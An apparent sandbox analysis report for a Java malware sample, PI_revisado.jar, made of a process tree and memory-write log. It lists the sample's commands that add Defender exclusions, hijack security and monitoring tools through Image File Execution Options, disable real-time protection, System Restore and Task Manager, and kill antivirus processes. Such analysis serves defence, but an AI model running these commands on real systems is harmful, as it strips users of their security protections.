PID 4436 wrote to memory of 4468	4436	cmd.exe	325
PID 4436 wrote to memory of 4468	4436	cmd.exe	325
PID 4436 wrote to memory of 4496	4436	cmd.exe	326
PID 4436 wrote to memory of 4496	4436	cmd.exe	326
PID 504 wrote to memory of 4548	504	java.exe	327
PID 504 wrote to memory of 4548	504	java.exe	327
PID 4548 wrote to memory of 4592	4548	cmd.exe	329
PID 4548 wrote to memory of 4592	4548	cmd.exe	329
PID 4548 wrote to memory of 4632	4548	cmd.exe	330
PID 4548 wrote to memory of 4632	4548	cmd.exe	330
PID 504 wrote to memory of 4652	504	java.exe	331
PID 504 wrote to memory of 4652	504	java.exe	331
PID 4652 wrote to memory of 4696	4652	cmd.exe	333
PID 4652 wrote to memory of 4696	4652	cmd.exe	333
PID 4652 wrote to memory of 4744	4652	cmd.exe	334
PID 4652 wrote to memory of 4744	4652	cmd.exe	334
PID 504 wrote to memory of 4784	504	java.exe	335
PID 504 wrote to memory of 4784	504	java.exe	335
PID 4784 wrote to memory of 4856	4784	cmd.exe	337
PID 4784 wrote to memory of 4856	4784	cmd.exe	337
PID 4784 wrote to memory of 4848	4784	cmd.exe	338
PID 4784 wrote to memory of 4848	4784	cmd.exe	338
PID 504 wrote to memory of 4896	504	java.exe	339
PID 504 wrote to memory of 4896	504	java.exe	339
PID 4896 wrote to memory of 4956	4896	cmd.exe	341
PID 4896 wrote to memory of 4956	4896	cmd.exe	341
PID 4896 wrote to memory of 5008	4896	cmd.exe	342
PID 4896 wrote to memory of 5008	4896	cmd.exe	342
PID 504 wrote to memory of 5000	504	java.exe	343
PID 504 wrote to memory of 5000	504	java.exe	343
PID 5000 wrote to memory of 5088	5000	cmd.exe	345
PID 5000 wrote to memory of 5088	5000	cmd.exe	345
PID 5000 wrote to memory of 5112	5000	cmd.exe	346
PID 5000 wrote to memory of 5112	5000	cmd.exe	346
PID 504 wrote to memory of 3236	504	java.exe	347
PID 504 wrote to memory of 3236	504	java.exe	347
PID 3236 wrote to memory of 4204	3236	cmd.exe	349
PID 3236 wrote to memory of 4204	3236	cmd.exe	349
PID 3236 wrote to memory of 4172	3236	cmd.exe	350
PID 3236 wrote to memory of 4172	3236	cmd.exe	350
PID 504 wrote to memory of 4176	504	java.exe	351
PID 504 wrote to memory of 4176	504	java.exe	351
PID 4176 wrote to memory of 4284	4176	cmd.exe	353
PID 4176 wrote to memory of 4284	4176	cmd.exe	353
PID 4176 wrote to memory of 4332	4176	cmd.exe	354
PID 4176 wrote to memory of 4332	4176	cmd.exe	354
PID 504 wrote to memory of 4380	504	java.exe	355
PID 504 wrote to memory of 4380	504	java.exe	355
PID 4380 wrote to memory of 4372	4380	cmd.exe	357
PID 4380 wrote to memory of 4372	4380	cmd.exe	357
PID 4380 wrote to memory of 4500	4380	cmd.exe	358
PID 4380 wrote to memory of 4500	4380	cmd.exe	358
PID 504 wrote to memory of 4520	504	java.exe	359
PID 504 wrote to memory of 4520	504	java.exe	359
PID 4520 wrote to memory of 4620	4520	cmd.exe	361
PID 4520 wrote to memory of 4620	4520	cmd.exe	361
PID 4520 wrote to memory of 4632	4520	cmd.exe	362
PID 4520 wrote to memory of 4632	4520	cmd.exe	362
PID 504 wrote to memory of 4716	504	java.exe	363
PID 504 wrote to memory of 4716	504	java.exe	363
PID 4716 wrote to memory of 4744	4716	cmd.exe	365
PID 4716 wrote to memory of 4744	4716	cmd.exe	365
PID 4716 wrote to memory of 4884	4716	cmd.exe	366
PID 4716 wrote to memory of 4884	4716	cmd.exe	366
PID 504 wrote to memory of 4848	504	java.exe	367
PID 504 wrote to memory of 4848	504	java.exe	367
PID 504 wrote to memory of 5104	504	java.exe	369
PID 504 wrote to memory of 5104	504	java.exe	369
PID 504 wrote to memory of 4184	504	java.exe	371
PID 504 wrote to memory of 4184	504	java.exe	371
PID 504 wrote to memory of 4284	504	java.exe	373
PID 504 wrote to memory of 4284	504	java.exe	373
PID 504 wrote to memory of 4488	504	java.exe	375
PID 504 wrote to memory of 4488	504	java.exe	375
PID 504 wrote to memory of 4752	504	java.exe	377
PID 504 wrote to memory of 4752	504	java.exe	377
PID 504 wrote to memory of 5032	504	java.exe	379
PID 504 wrote to memory of 5032	504	java.exe	379
PID 504 wrote to memory of 4200	504	java.exe	381
PID 504 wrote to memory of 4200	504	java.exe	381
PID 504 wrote to memory of 4312	504	java.exe	383
PID 504 wrote to memory of 4312	504	java.exe	383
PID 504 wrote to memory of 4552	504	java.exe	385
PID 504 wrote to memory of 4552	504	java.exe	385
PID 504 wrote to memory of 4632	504	java.exe	387
PID 504 wrote to memory of 4632	504	java.exe	387

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3388	attrib.exe
1616	attrib.exe
3556	attrib.exe
760	attrib.exe
3888	attrib.exe
3332	attrib.exe
1640	attrib.exe
3468	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\PI_revisado.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:504
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2256
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2496
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3092
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3828
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3332
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1640
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\TKnJu\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3468
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\TKnJu\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3388
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\TKnJu
  2⤵
  - Views/modifies file attributes
  PID:1616
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\TKnJu
  2⤵
  - Views/modifies file attributes
  PID:3556
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\TKnJu
  2⤵
  - Views/modifies file attributes
  PID:760
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\TKnJu\nfOlo.class
  2⤵
  - Views/modifies file attributes
  PID:3888
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:3816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\TKnJu','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\TKnJu\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1356
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:1460
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1520
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1536
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:952
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:2272
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:3852
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3992
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3600
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:784
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3612
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1928
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2208
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1572
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3528
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:3000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2692
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:1320
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:3544
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2276
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1556
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:760
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:2260
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3144
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2684
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3764
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:2308
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3840
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2552
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2824
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2476
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1368
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:3992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:1572
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3620
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2624
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:3856
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:3372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:760
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:692
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:3808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3012
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:3528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:3984
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:3860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:3992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:2796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3872
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:3920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1216
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:2508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:2256
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:760
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3984
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:2840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:2796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:3820
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:2840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:2848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:2024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:3828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:3888
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:3828
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:3016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4000
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3492
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:2848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4112
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4188
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4208
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4280
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4268
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4320
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4408
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4544
- - C:\Windows\system32\reg.exe
